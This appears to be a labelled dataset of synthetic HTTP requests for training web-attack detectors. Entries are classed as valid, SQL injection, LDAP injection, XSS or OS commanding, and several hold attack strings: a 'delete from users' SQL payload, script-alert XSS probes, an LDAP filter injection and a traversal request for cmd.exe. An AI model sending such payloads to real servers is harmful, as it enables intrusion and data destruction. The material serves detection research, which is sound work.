GET /mj4H/ek/tsmt/afqtHrTrbtsaorieA/jkA_rH/aDMaJF.dll?ltiteUepdtoE=nWQRN&nseaiagOi=h&ne3nd=567&Keumf2n=31427&Ze6ot.v-eM=ixm&jemmoas=8 HTTP/1.0
Host: 150.196.148.81
Connection: close
Accept: */*
Accept-Charset: ks_c_5601-1987
Accept-Encoding: 
Accept-Language: rhnl2-seha, iDir-msho, Nezr-2sdndy;q=0.6, dec-ois;q=0.3, O-bera
Cache-Control: no-transform
Client-ip: 183.111.200.232
Cookie: Ciea0do=62988;ctyrgrlct=t;DdITvbscriptjyPhtaccesD0T=95;eflrioter1mh=a6Y04VHnjE6;apwde=18;rfenn92dejee=373
Cookie2: $Version="396"
Date: Sun, 26 Sep 04 11:45:50 UTC
ETag: W/"0l4b4EjQF@zOGq4rP"
Expect: 100-continue
From: afReCmmd@ea5oe.uk
If-Modified-Since: Mon, 03 Oct 05 08:43:15 UTC
If-Unmodified-Since: Thu, 24 Aug 06 06:21:05 CET
If-Match: *
If-None-Match: *
If-Range: "F0MFpNBltFPVQ6hW6AZ"
Max-Forwards: 61
MIME-Version: 0.4
Pragma: oLori=peCpd9mn
Proxy-Authorization: puyR ypeoqttF=hne2i
Authorization: Basic Z3Z2aWk3ZDpodTZ0MGxy
Range: 9724-,33511-083617,2-
Referer: /ct0nl/2wdW/rmlz/qditn/1oeRycss.mpg
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: enaYb (aGtDJ1; vc2qsYv-; ljod5EB; bWeh4ZtmB; o1vZgrJLf)
UA-CPU: x86
UA-Disp: 490,8525,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 912x237
Via: 0.8 154.2.1.137, FTP/6.7 www.jyEdzeaX.jpeg
Transfer-Encoding: identity
Upgrade: pa7r/0.7, 9lsi/0.4
Warning: 307 www.etnss2o.gif "ulniddsoy" 
X-Forwarded-For: 162.29.213.245
X-Serial-Number: 0392549
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1794
Start - Id: 1149
class: Valid
GET /fromv7_xGYtoPSiframe/9yyk4.R./QcRcio8abhtgoeert/oj88ca-P/gmpmtdius6ornheiquh/oeeyeno/IgSkLjdXX9/oddvayuys67aiiathp/a4NxTnFbM3GfIczPU.msf?dn3e8Set2ta=%5CdbralluuJig3bOt&ar7rcgtruZ=aeselect%3Ein3ent6yf%7E&LkFb=eh%2BeT&risStpo=0&2oatyitelon=rv%26&3lpinwAg86trawf=58126&tjenucoD=80919&qhSRsse=Mbe&peesay=CU4rk5nitn&dn=wss73tc4tdeti&nbLTs=170 HTTP/1.0
Host: 42.247.110.211
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: gzip, gzip;q=0.2, gzip;q=0.9, compress
Accept-Language: e9rStwe-iu, vxsi-tiuos2g7, fsl0-niegteyl, Jfesw-eEee
Cache-Control: lprnhtlm=X4ems9
Client-ip: 37.232.123.226
Cookie: zetcvN05zgEFwhere=tnhnnaecercpQ;lmrgtiwti=toenipe;dkchhgh=phefJ;0akwxISdmeta=swZ
Cookie2: $Version="6"
Date: Sat, 20 Mar 04 18:11:27 CET
ETag: "GZBpFHX3VLJ_hb-Gbk"
Expect: r1xhc9ql
From: Wial@ta7da.ch
If-Modified-Since: Mon, 10 Aug 09 06:38:26 UTC
If-Unmodified-Since: Sun, 24 Feb 08 08:33:22 CET
If-Match: *
If-None-Match: "WwXNcphajELgkn_"
If-Range: "AySOfoMQcrE5gcx"
Max-Forwards: 54
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest username="neou"
Authorization: Basic czNpczY6ZWQ5YUVuY28=
Range: 6-
Referer: http://www.ltC2ouey.be/c7wa/aslqhi/tYbrh/dbsee.swf
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.0 (compatible; Konqueror/4.3; Linux i386; dNtComle)
UA-CPU: x86
UA-Disp: 111,7924,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 597x246
Via: 0.8 www.hwrejh.jpg, FTP/2.3 88.29.187.181, 9.7 www.Hsdtg.png
Transfer-Encoding: deflate
Upgrade: nah/6.7
Warning: 730 212.195.75.43 "sfsxmFuelsaa6" 
X-Forwarded-For: 174.219.186.109
X-Serial-Number: 2559781115127
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1149
Start - Id: 37673
class: LdapInjection
PUT /ONTs1cam3y/seaEl2EeInau/0a_TR/eat2Odei/HmXD.xVB/tm.w/iG4U/enoI_FG1/lrsiV.js? HTTP/1.1
Content-Length: 99
Content-Language: Zw
Content-Encoding: deflate
Content-Location: http://tid67aa.gov/wHx9gvi/oi0sns/arsdn/retoPtl.sh
Content-MD5: ZW5hdHd1d2VZcHJhbW9ucQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 Nov 07 08:26:52 UTC
Last-Modified: Sat, 03 Feb 07 08:15:25 UTC
Host: www.Iio7As.cz
Connection: keep-alive
Accept: image/*, image/jpeg;q=0.5, application/postscript
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.3, identity, deflate
Accept-Language: stdo-aasel;q=0.5
Cache-Control: one1eQ1=oo01opct
Client-ip: 77.204.246.223
Cookie: oeiiodmql=jlbKZfPXZNM;RnwwffounngddOh=ieotytslls&tmlike4q ;a3NcA3h=ebOLn
Cookie2: $Version="613"
Date: Thu, 12 Jul 07 10:59:21 UTC
ETag: "L1wKH0qc0h5OgNanY"
Expect: 100-continue
From: ssDeu@yeiMt.st
If-Modified-Since: Sun, 09 Jan 05 05:01:11 CET
If-Unmodified-Since: Thu, 19 Oct 06 12:39:44 GMT
If-Match: "fdP.5sI.R-AUru88"
If-None-Match: *
If-Range: Mon, 08 Nov 04 04:50:13 UTC
Max-Forwards: 87
MIME-Version: 9.4
Pragma: sd4qsc='lraldnoe'
Proxy-Authorization: Digest uri=/heen1roq/eredadu/eloyue/dceeE.cgi
Authorization: Digest opaque="Lrea"
Range: 71-
Referer: http://www.mfbl.org/thrhyc/tuud/4oee/kaOs5s.dll
TE: trailers
Trailer: Authorization
User-Agent: oBEfFS http://www.hyi8it.cz
UA-CPU: MIPS
UA-Disp: 770,856,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 940x1719
Via: 2.1 2.34.100.72, HTTP/1.0 206.92.198.88, HTTP/0.9 22.236.122.79
Transfer-Encoding: compress
Upgrade: pemoEi/4.0
Warning: 123 225.46.208.152:9661 "sweilsrzmalesAdlaO" 
X-Forwarded-For: 193.224.2.50
X-Serial-Number: 7386288464563322200
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ti=r \phq&gr5=odocumentHe/tos0heinsertnbt&Ero=")(targetfilter=(o=NetscapeRoot))

End - Id: 37673
Start - Id: 2874
class: Valid
GET /dEhcwjTA.exe?oh2emEdriaaeo=deleteo0&Aa=nL6&aeXyfmH=862160995&nf=746829243&hurOA96XdJa=pewget HTTP/1.0
Host: www.Itawctirn.de
Connection: gilhoeo
Accept: */*;q=0.5
Accept-Charset: windows-1251, windows-1254;q=0.9, iso-8859-15;q=0.8
Accept-Encoding: *
Accept-Language: i-eRcmts, bttpf-tiA3b;q=0.1, It-aoddodex;q=0.7, itPsqhhr-ittsoa
Cache-Control: max-age=8564
Client-ip: 212.111.101.213
Cookie: pa_Zn=rbe;aTd=46871;4e=1thlnn;tttIhtHtns8un=ndpea;svsc7oudHhuf=929;execDgnodexbgsoundH.j=Sewhzl
Cookie2: $Version="7"
Date: Mon, 25 Aug 08 01:20:04 UTC
ETag: W/"75mKU4khjzIg6n5ch3"
Expect: 100-continue
From: amatu@3ain.cz
If-Modified-Since: Fri, 23 May 08 01:50:14 UTC
If-Unmodified-Since: Sun, 25 Jun 06 23:01:30 CET
If-Match: "fGxAmLv@J.Qd0atoiI"
If-None-Match: "_jY8ZvN6GGtW00W49y0z"
If-Range: Fri, 25 Nov 05 12:35:03 GMT
Max-Forwards: 767
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Digest response="FBDBFBaB00C6Be1B5EEFF9E4Dab872A2"
Authorization: Digest cnonce="tntr6s"
Range: -919,-358031
Referer: http://www.iitTo.gov/s3ath8da/32n6/lianl.png
TE: chunked;q=0.1
Trailer: Upgrade
User-Agent: Mozilla/5.9 (compatible; STdfbR; Win 9x; t4md; tpieNeutet; tntfr)
UA-CPU: 68000
UA-Disp: 7777,5626,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 640x6169
Via: HTTP/7.4 129.177.239.250, FTP/1.9 144.183.132.234
Transfer-Encoding: gzip
Upgrade: dp5e/7.1, 6Wocs/8.4, sytonn/2.0, a4edeH/0.9
Warning: 099 95.98.177.126 "uhlee7I" "Sun, 14 Dec 08 08:21:49 UTC"
X-Forwarded-For: 61.7.104.185
X-Serial-Number: 440914790634409640
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 2874
Start - Id: 35440
class: SqlInjection
POST /er/5wMUZisr7/unionvMd/iKcQI-WB9Mm0TS3b/eDJ.exe? HTTP/1.1
Content-Length: 274
Content-Language: tw3,or,thdaa
Content-Encoding: identity
Content-Location: /e3r0clr8/aab5o.asmx
Content-MD5: dG5kNHNyMHNsdGFpQWJhYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 23 Apr 09 17:31:06 GMT
Last-Modified: Tue, 06 Jun 06 10:50:27 GMT
Host: www.ardajtcN.net
Connection: zehni
Accept: */*
Accept-Charset: iso-10646-ucs-2;q=0.2, x-mac-chinesetrad;q=0.4, windows-1252;q=0.2, windows-1252
Accept-Encoding: ' );     delete from  users; commit; dummy(   '
Accept-Language: *
Cache-Control: min-fresh=47
Client-ip: 177.250.141.179
Cookie: tttaiVARr9g=gsdc+8ppchildmOm ;k6p8eHpaiohshu= t;ctayp6xag=oBnyrGesnncAnmm;Zemar=oi$Cg:;2BTgiibaudu=in4gsNemWNeiq
Cookie2: $Version="236"
Date: Wed, 18 Jul 07 14:10:49 CET
ETag: "6xnMS8K6Tgx8_10I9oD"
Expect: 3aee2=ob58uou;1kidux
If-Modified-Since: Sat, 24 Jul 04 24:42:34 GMT
If-Unmodified-Since: Sat, 17 Nov 07 17:42:25 GMT
If-Match: "LTDbEWGlH8-Ce4Gz"
If-None-Match: *
If-Range: *
Max-Forwards: 79
MIME-Version: 9.4
Pragma: no-cache
Authorization: Basic aU44Y3RhbzplYnhycmRnaQ==
Referer: /3Aqj/troFnll/hllztbn/n6rIs/eJqot.cgi
User-Agent: vtgj/6.7.8.6.7
UA-OS: Windows 95
Via: 3.7 www.spcoLr8r.jpeg, HTTP/0.5 www.swhoceio.png:85
Transfer-Encoding: identity
Warning: 040 www.aads.shtml "Lmnotfsuaiytt" "Wed, 10 Jun 09 05:28:12 CET"
X-Forwarded-For: 128.157.201.106
X-Serial-Number: 8980976
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Du6uNokytegAss=slarmor&ro=eFbTJ&egd13=re84&hoaweh=gknAc&cbnoatMenta6=eqne&seeeytwn3ne1nlj=e_Lx&giaHaeeNtfje=0444&tsoqa6meetvs=tqpuy'fi i&xs4mHTsqdb=6&orobubno=8040&macahlhia=1813200&f7=77952&7rnhuftqo2=tngroup by'&lehaysieatsyt=7827&5leaeaa=os(]'s0evalostmpechoObo

End - Id: 35440
Start - Id: 48199
class: XSS
PUT /rg1p3W/DjownothteclquoixehE/cle4ltaxanioNq2.js? HTTP/1.0
Content-Length: 107
Content-Language: 5ioh
Content-Encoding: gzip
Content-Location: /mnSer/2h9e/ogvTh0e.gz
Content-MD5: cmNyZWgzaWVuOHR6bnFyZw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 13 Jan 05 06:32:48 CET
Last-Modified: Thu, 10 Aug 06 19:02:21 GMT
Host: 255.187.187.70:6
Connection: close
Accept: image/gif
Accept-Charset: windows-1258
Accept-Encoding: <style    type ="  text/javascript "  >[alert   ('Ah');]</style >
Accept-Language: rnwNa-vL2, E0tn-thE0
Cache-Control: no-store
Client-ip: 198.54.180.201
Cookie: Iherati=1999;nvheamcmtuceo=s2wtUv4;KwgetX2CSN=538082;XincludeTCbq=42688;ni53el=telnetxe1dreplacee9rosystemEt
Cookie2: $Version="6"
Date: Wed, 18 Feb 04 07:48:51 GMT
ETag: W/"__Prerwr1jnojp8xn"
Expect: 100-continue
From: nio6@slo8Cr.fr
If-Modified-Since: Sat, 08 Jan 05 02:47:38 CET
If-Unmodified-Since: Sun, 24 Apr 05 24:03:08 UTC
If-Match: "_ZpeF5w8xIE665DPiS8"
If-None-Match: "FL9ZWBtc@qf-zR8"
If-Range: Tue, 19 Jul 05 23:08:21 UTC
Max-Forwards: 5011
MIME-Version: 2.8
Pragma: 2aow='dktcu5rT'
Proxy-Authorization: Basic ZHI0bWU6YVRlbg==
Authorization: NTLM NGhzdG94Y25rb2Rpa25ueWVyaXJtZ3VtbjZkZHFkM3hUanJvZzFvcGx0
Referer: http://www.tist.org/sitboeyr/eta1.fgf
TE: gzip;q=0.9
Trailer: If-Range
User-Agent: e6yi/4.7.6.6
UA-Disp: 9694,0941,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9098x7703
Via: oesO9/8.0 168.114.250.243, 8.1 www.beEhsh5.js, 7.2 174.243.0.149
Transfer-Encoding: gzip
Upgrade: nw3/1.2, Eccue/9.3, dnaeM/4.7, yeug/4.3
Warning: 376 www.tr4on.jpeg "m7aaREuTTovptbolar" 
X-Forwarded-For: 251.96.98.120
X-Serial-Number: 340888141293
----: -------------

R7TWetcFusrjS=aQ@Ht&uamalt=doZctp]ba&cal=:ndd85ih crs&mnpEPoh=iNpei&ec0yra=8&oe=dehnwasnttr&o8m=eexec

End - Id: 48199
Start - Id: 44174
class: OsCommanding
GET ..%%35c../..%%35c../..%35c../..%35c../winnt/system32/cmd.exe? HTTP/1.1
Host: 130.57.159.54
Connection: luI0tf
Accept: audio/*, image/*, application/*
Accept-Charset: euc-tw, windows-1255, iso-8859-8, shift_jis;q=0.9, koi8-r
Accept-Encoding: compress
Accept-Language: *
Cache-Control: no-cache
Client-ip: 59.27.46.32
Cookie: tmeta50document4G-6=pix_pxXbLf-;dVWmLPwB=3897805590;meiDtaw=)
Cookie2: $Version="987"
Date: Wed, 21 Jan 09 24:52:25 CET
ETag: "@pQtfkHChnDufap0Uh"
Expect: 100-continue
From: a6ssEboa@0sqFIsecq.uk
If-Modified-Since: Wed, 16 Apr 08 16:49:15 GMT
If-Unmodified-Since: Mon, 07 Jan 08 22:52:19 UTC
If-Match: "wQRFn95bknpgijB"
If-None-Match: "SzWwgNJNdiIahrV"
If-Range: *
Max-Forwards: 5867
MIME-Version: 3.5
Pragma: t=n
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: 1mAes ohsnlr=eefi
Range: 5-,-97,-5
Referer: http://www.75a8.uk/bemie1ff/ooe9rz/Aiea/sx9ba/nrse.mpg
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/4.8 (Windows; U; Win98 5.7; 57-ay; rv:2.6.2) Gecko/52436978
UA-CPU: Sparc
UA-Disp: 0908,917,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 389x154
Via: 0.6 252.49.31.229:7678
Transfer-Encoding: compress
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 195.218.223.142
X-Serial-Number: 386658457153334430
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44174
Start - Id: 3513
class: Valid
GET /MdlVhZcldl/uh3cl3uzjO1U0G/pdOSliframet@9H/ch9IlIMZ60xM/t0Sonemabls2/amergEAeraun0/myuirsa1tgz.html?diamitr=y%5CaB6jhe%3Bpassthru+a5samchildtbhtand&d77mX=65&v0=30&eet2bmsTwll9rEe=984623&5tinoitbgnerr=%3Bw&ibao=er8-8e8u HTTP/1.1
Host: 219.104.184.32
Connection: keep-alive
Accept: */*
Accept-Charset: macintosh;q=0.8, x-mac-greek;q=0.9
Accept-Encoding: 
Accept-Language: n-ma, h-dq6pba;q=0.2
Cache-Control: no-transform
Client-ip: 61.50.151.28
Cookie: ajneanj=[etct;sogR1licsei=n81;xdeb=50371343;soGhnsaRlw=7;ue0=labXMR
Cookie2: $Version="02"
Date: Tue, 04 Nov 08 01:59:17 GMT
ETag: "l87AYLdV.HD213DvJc2"
Expect: m1rsfssw
From: 4qmTaq3m@xens.uk
If-Modified-Since: Sat, 31 Jan 04 18:59:17 GMT
If-Unmodified-Since: Thu, 03 Mar 05 07:50:05 GMT
If-Match: "GO8VNGPbP-CZdXAzBeMC"
If-None-Match: *
If-Range: Sat, 27 Sep 08 07:02:29 CET
Max-Forwards: 88
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: NTLM eXNhcGFJMmxyMGk3TnV2aWl1b3A3dGFndHZmYWllZGNpc25wb2w=
Authorization: NTLM cGVzZmhpYWF1dWVyaXR6NTRxZmFpMm5sYk9pRXh1ZEVl
Range: -30400,-8
Referer: /tad8o/sltk/tmeib/anRtB/2pabnawT.exe
TE: trailers
Trailer: Connection
User-Agent: Mozilla/1.2 (X11; U; SunOS sun4u 7.0; 2s-mo; rv:4.5.3) Gecko/17900206
UA-CPU: StrongARM
UA-Disp: 845,505,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 3900x7810
Via: 1.1 www.Mfosrr.tiff, FTP/1.9 www.stargeri.png, 4.5 www.nont.shtml
Transfer-Encoding: identity
Upgrade: enqoe/0.8, trn/8.9, Hbkn/6.9, etm/2.0
Warning: 091 199.68.197.103 "tasntac2pontmt" "Sat, 20 Oct 07 17:48:51 GMT"
X-Forwarded-For: 75.187.112.213
X-Serial-Number: 77802
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3513
Start - Id: 977
class: Valid
GET /n6f_UMBcLbtW/m_q@ZB2iYNrH/Vyau49lza/demb3rnEmooNion/V7ouwgetK/gA0eHpp_lb1JM9kn3/z6FX0wwP/U1opbSz.jpg?Steaast=e&Z0eo7zt=tAdvtcg4yAE9ehaesy&Ttv8R=bnn+H&hmikieibioale=rab&alMh=hya2dMhpo%3Davldg HTTP/1.1
Host: www.did8athioo.cz
Connection: Lemt
Accept: image/*, image/jpeg;q=0.8
Accept-Charset: x-mac-chinesesimp
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-transform
Client-ip: 193.35.188.230
Cookie: -1rhomeUiTWpsU= irfenene;h9A5tcbm=u9s;eShy=oaPaOfOw;0zr-documentAvb4=3267491
Cookie2: $Version="98"
Date: Sun, 02 Jul 06 17:51:21 UTC
ETag: "ELdOJzom_LZ@.9w2x"
Expect: loguol7y
From: drgltVi@44huhi.be
If-Modified-Since: Mon, 27 Feb 06 10:53:51 GMT
If-Unmodified-Since: Wed, 06 May 09 21:52:04 CET
If-Match: "7m0eOVCFozRFrvOFo"
If-None-Match: "tH3YWcwJiBpyBLb"
If-Range: "6PzdH26MDQ9dfQC"
Max-Forwards: 992
MIME-Version: 5.4
Pragma: n=Udenzmni
Proxy-Authorization: amit hx71ti9=tovd
Authorization: NTLM amluaU9lbmhhM2U1aW90cnBzeGFsbDdkYm5hU3Vmcm4=
Range: 861-
Referer: /i9kttt2s/BDeH.jpeg
TE: trailers
Trailer: Connection
User-Agent: Mozilla/6.6 (Machintosh; U; Mac OS X 5.1; so-yh; rv:4.0.6) Gecko/38729444
UA-CPU: MIPS
UA-Disp: 419,762,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 873x994
Via: 2.0 242.76.136.33
Transfer-Encoding: deflate
Upgrade: speh/3.3, Eai/0.1, hYun/9.4, uabeh/7.5, 8re3/1.6
Warning: 377 www.tccn1n.htm "TKmed" "Sun, 06 Sep 09 10:54:33 CET"
X-Forwarded-For: 18.21.214.141
X-Serial-Number: 045784
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 977
Start - Id: 11707
class: Valid
GET /Nj1likeTG9D8positiony/nzah/egfYwm/likPtI4B/tfu7l0Wo7bvh/nxlls6gexlo0l5rwt/attlhe0eheouee8lna.htm?ZlmGyo9GKqhtpassP=irrruop&aeoss=8&vv7chkrbtleta=rr&aJDhdZTBv=eIaconnect2drs&Hiwtwsls=anw+scriptte&erur=aZJ&bpassthruwH5=7eexecc%5Cszasysteme&kdvqmdVcatYnetcat=30&mthn=771 HTTP/1.1
Host: 54.80.216.81
Connection: pes1twne
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: deflate, compress;q=0.3
Accept-Language: *
Cache-Control: no-store
Client-ip: 228.241.203.171
Cookie: nhfr=6312;trsSa=tao oeGct shutdownkgINo;dahrinHvjNl=+oo1tamkFseg
Cookie2: $Version="830"
Date: Wed, 29 Nov 06 03:26:16 GMT
ETag: W/"YTbPSJ_io3J4e-wVZ0sy"
Expect: 100-continue
From: sirxnDi@0oociO.fr
If-Modified-Since: Thu, 29 Jan 09 24:05:55 UTC
If-Unmodified-Since: Wed, 20 Jun 07 23:37:20 CET
If-Match: ".wAAcK-WcSiiZb3Y"
If-None-Match: *
If-Range: *
Max-Forwards: 6661
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="ciapc"
Authorization: Digest uri=/habrao/xscc/tceeitn/sePky4lo/ihfn.txt
Range: 9808-4454,-4,572-193568
Referer: http://iilo.it/mh8NZt.gif
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/0.4 (Windows; U; Windows NT 3.6; au-uo; rv:3.1.8) Gecko/96764083
UA-CPU: x86
UA-Disp: 940,7536,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8474x4418
Via: HTTP/9.7 www.oiai.htm
Transfer-Encoding: amutaw
Upgrade: tg2r/9.0, fere/5.1, Samd/0.1, iasFl/4.6
Warning: 482 www.edeet.html "st2tianaieN" 
X-Forwarded-For: 129.43.76.8
X-Serial-Number: 2344723441
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11707
Start - Id: 12396
class: Valid
GET /Rgco5bnullO@uiVphpLB/aeesth/fmwcvaerntTe0defb6/nEnaAob1hpoa6/eOG3ForA1@XgL/zt92/shq/l.GpnCV/uilssnwbJepsoOwe/h@4Y@l4bPxF7todfycI..msf?hwOe=2&W3Jin=euHhmv0eVaclt&t0rrmHHew=754786703&tdradeTqaw=3320058&gotolphied1dpe=%40ni&ic-BnPw-I=588674354&esys=l6ltuantvnlhvh1d0i&h4iHhenla=ex%403kwkpjnbA&t2wrjt=4474&eaooiicrdsag0da=59310153&t3td=si&yndewgrbeiy8eed=E3ninn5taaoN7z&tivh=wvrl4ttecmp&wtoTnoeHrsuv8=2552 HTTP/1.1
Host: 15.203.19.207:42
Connection: ioMt23t
Accept: */*
Accept-Charset: windows-1251, x-mac-greek;q=0.6, x-mac-arabic, iso-8859-4, x-mac-ce
Accept-Encoding: deflate;q=0.0, gzip;q=0.5, compress;q=0.6, compress;q=0.4, gzip;q=0.3
Accept-Language: hi6-a, oakcel-hcgtv, fxsXi-io0cT6;q=0.0, Nean-c0aEs;q=0.6
Cache-Control: only-if-cached
Client-ip: 158.234.101.5
Cookie: tet8r=iTdwaoaTlm;ron= ic0d;c_B.U@allwp-lb=aJaLfI8P0Orl;i1SiN9giu=gcBPej8o;asswi=797267;o02k1hraaPted=Snl
Cookie2: $Version="00"
Date: Fri, 12 Dec 08 04:22:41 UTC
ETag: "IngueJ6JxcRPXvyQH"
Expect: ntndd
From: e4eiiuh@Mdhi8o.com
If-Modified-Since: Wed, 30 Sep 09 04:11:23 GMT
If-Unmodified-Since: Fri, 21 Oct 05 07:04:30 GMT
If-Match: *
If-None-Match: "R_ipd29mf860.fFkqH"
If-Range: Thu, 13 Mar 08 11:04:06 CET
Max-Forwards: 882
MIME-Version: 1.2
Pragma: nlkRcl='syn'
Proxy-Authorization: Digest username="Ao5t0s1E"
Authorization: Digest realm
Range: -119886,3059-
Referer: /h1iinid/ninko/t8o7cr.ace
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/0.0 (X11; U; Open BSD i586 4.1; hl-au; rv:9.4.6) Gecko/25415250
UA-CPU: PowerPC
UA-Disp: 8747,794,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8258x863
Via: FTP/9.5 134.224.14.94, HTTP/6.0 www.e3ih3n.shtml
Transfer-Encoding: identity
Upgrade: hrA/6.7, e6zNoo/8.6, lilor/5.4, esys/7.1
Warning: 750 www.lnee.gif "jYageno3napa2elhv" "Mon, 22 Mar 04 04:46:33 UTC"
X-Forwarded-For: 106.171.134.114
X-Serial-Number: 41667021783349598958
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12396
Start - Id: 46523
class: XSS
GET /<script>alert('Vulnerable')</script>.shtml? HTTP/1.1
Host: www.pqioa9nLty.be
Connection: close
Accept: text/html
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 4b-kelunt;q=0.0
Cache-Control: max-age=7414
Client-ip: 246.28.222.74
Cookie: Nfnudc6pmtg=e7Rm
Cookie2: $Version="92"
Date: Sat, 16 Aug 08 19:29:54 CET
ETag: "aNVJT2lKpqFCO9DMA"
Expect: Sire7=hmiat
From: ns7rogjc@npah.it
If-Modified-Since: Mon, 09 Feb 09 23:00:04 GMT
If-Unmodified-Since: Thu, 22 Sep 05 02:18:48 CET
If-Match: "wa6B8W4dHwr_V0Uo.1if"
If-None-Match: "pxj_m.gXQ6E2vKg"
If-Range: "39BfhVaP4oOWHRYG@"
Max-Forwards: 892
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: evg2o7 3usa9ee=Jqio83
Range: -97604
Referer: /hmiH0t8/raIirta/Epkrxr.wmn
TE: chunked;q=0.5,gzip
Trailer: If-None-Match
User-Agent: Mozilla/1.7 (compatible; lhstt; Linux i586; sTIT; TssinAc; Hyeuorgi)
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 139x000
Via: HTTP/2.6 www.nRlS.tiff
Transfer-Encoding: gzip
Upgrade: lAi/5.0, Nac/9.0, NeseBu/6.1, 6tswwc/0.1, it7Ey/2.3
Warning: 034 www.etht.jpeg:884 "dpke7ieui1ew0" 
X-Serial-Number: 907134703793407479
----: --------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 46523
Start - Id: 25825
class: Valid
GET /ogY/mWb5gm3jPW5-6/lnQmPA4gzM@qjlqbZ/RTxp/lhto5u3at/47wyyak/d96/qqDqiWvh0xtBUdW/3R/blpGcew/5AE.jpeg?o0=ldrop%26sCxbn%3FgEcdhivar+processing-instruction&lslbFspdmIe=styllAng3n&fFDftp=pGP49pByBXHL&9erasfTmcpt8=jnQ4KHlIQu&ldelTroh=anarg%3Dh&oIgreuliqeYcg=+au1r&RAdeval.=001&mnafoieRew2h3dc=icopt7%3Ducmc%3Ddesock_streamnd-%7E1%5Bu HTTP/1.0
Host: 34.121.127.208:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: windows-1254;q=0.8, euc-jp, windows-1255, x-mac-chinesesimp, iso-8859-9;q=0.3
Accept-Encoding: 
Accept-Language: sthk6-cnpsi;q=0.5, eaae-ayi, t-hpwbta;q=0.0, apnp0f-e749ots;q=0.3
Cache-Control: no-transform
Client-ip: 253.102.123.168
Cookie: tcrsrOo=442;or9eAlqe8nu=1875878134;WTpLDQqknph-=R1
Cookie2: $Version="869"
Date: Sat, 26 Sep 09 19:30:13 GMT
ETag: W/"6-0IUYXuknh3eEUE"
Expect: vslup=28saei1e
From: ehrr@sqgr.com
If-Modified-Since: Mon, 02 Aug 04 15:44:52 UTC
If-Unmodified-Since: Sun, 26 Jun 05 03:49:20 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 31 Jan 07 04:07:46 GMT
Max-Forwards: 592
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Digest uri=http://tseiT5w.ch/3hoeTtpe/ueeanc/polor7yc.tiff
Authorization: Digest username="jingeAhe"
Range: 644-,-02
Referer: http://eyieqy.ch/lnfsa/tn0vtimi/u7su/etiOapta.exe
TE: gzip;q=0.0
Trailer: Accept-Charset
User-Agent: ntftCEB_Zz http://www.reiX.fr
UA-CPU: MIPS
UA-Disp: 733,9248,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3296x601
Via: 0.8 www.Muays.htm, FTP/9.9 155.204.20.255, FTP/3.9 www.uRtdsn.jpeg:67591
Transfer-Encoding: gzip
Upgrade: mi0ga/3.8
Warning: 886 145.152.248.154 "h6n7sqlaahdlAhre0" 
X-Forwarded-For: 243.205.213.82
X-Serial-Number: 5771791492061
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25825
Start - Id: 23901
class: Valid
